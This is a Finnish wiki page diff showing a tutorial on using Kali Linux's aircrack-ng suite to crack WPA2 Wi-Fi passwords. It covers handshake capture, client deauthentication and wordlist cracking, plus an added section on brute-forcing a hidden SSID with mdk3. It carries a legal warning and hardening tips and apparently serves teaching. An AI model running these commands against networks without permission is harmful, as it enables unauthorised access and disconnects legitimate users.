Ero sivun ”Kali Linux” versioiden välillä
(Tämä versio merkittiin käännettäväksi) |
|||
Rivi 108: | Rivi 108: | ||
<!--T:35--> | <!--T:35--> | ||
Tulostuu KEY FOUND: [salasanasi] | Tulostuu KEY FOUND: [salasanasi] | ||
+ | |||
+ | ==== SSID selville ==== | ||
+ | |||
+ | Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tieda mitaan. Haluaisit kuitenkin yhdistaa siihen, mutta et tieda ssid. Ja tukiasemassa ei ole ketaan yhteydessakaan | ||
+ | |||
+ | mdk3 wlan0 b -t 00:19:07:C4:8A:60 | ||
+ | |||
+ | Nyt se bruteforcettaa ja koittaa selvittaa kyseisen macciosoitteen omaavan tukiaseman ssid randomisti. Fiksua olisi toki kayttaa sanalistaa | ||
Versio 23. tammikuuta 2015 kello 12.29
Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.
Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.
Ohjeet ovat opetuskäyttöön.
Sisällysluettelo
Asennus
Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent -latausta, sillä paljon nopeampi kuin suoralataus.
Asentaminen on samankaltainen Debianin asennus
Paketit
Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.
HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä!
aircrack-ng
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
1. Avataan root terminaali
2. Määritetään langaton verkkokortti
airmon-ng aloittaa wlan0
3. Tämä komento listaa kaikki lähialueen WLAN-verkot
airodump-ng mon0
4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
- bssid = MAC osoite tukiasemasta
- write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen
5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
- --deauth 100 = Katkaise yhteys 100 kertaa
- –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
- –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta
Jos virhe
Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
aja komento (sammuta palvelu)
/etc/init.d/network-manager stop
Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5
6. Aletaan siis se oikea murtaminen.
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]
Esimerkiksi:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
- WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
- /usr/share/wordlist/* = polku salasana tiedostoon
Sitten vain odotetaan että hash on purettu.
Tulostuu KEY FOUND: [salasanasi]
SSID selville
Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tieda mitaan. Haluaisit kuitenkin yhdistaa siihen, mutta et tieda ssid. Ja tukiasemassa ei ole ketaan yhteydessakaan
mdk3 wlan0 b -t 00:19:07:C4:8A:60
Nyt se bruteforcettaa ja koittaa selvittaa kyseisen macciosoitteen omaavan tukiaseman ssid randomisti. Fiksua olisi toki kayttaa sanalistaa
Paranna WLAN verkkosi tietoturvaa
Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.
- käyttämällä pitkää, yli 8 merkkistä salasanaa
- Isoja ja pieniä kirjaimia
- erikoismerkkejä
- numeroita
- ei ole mikään sana tai lause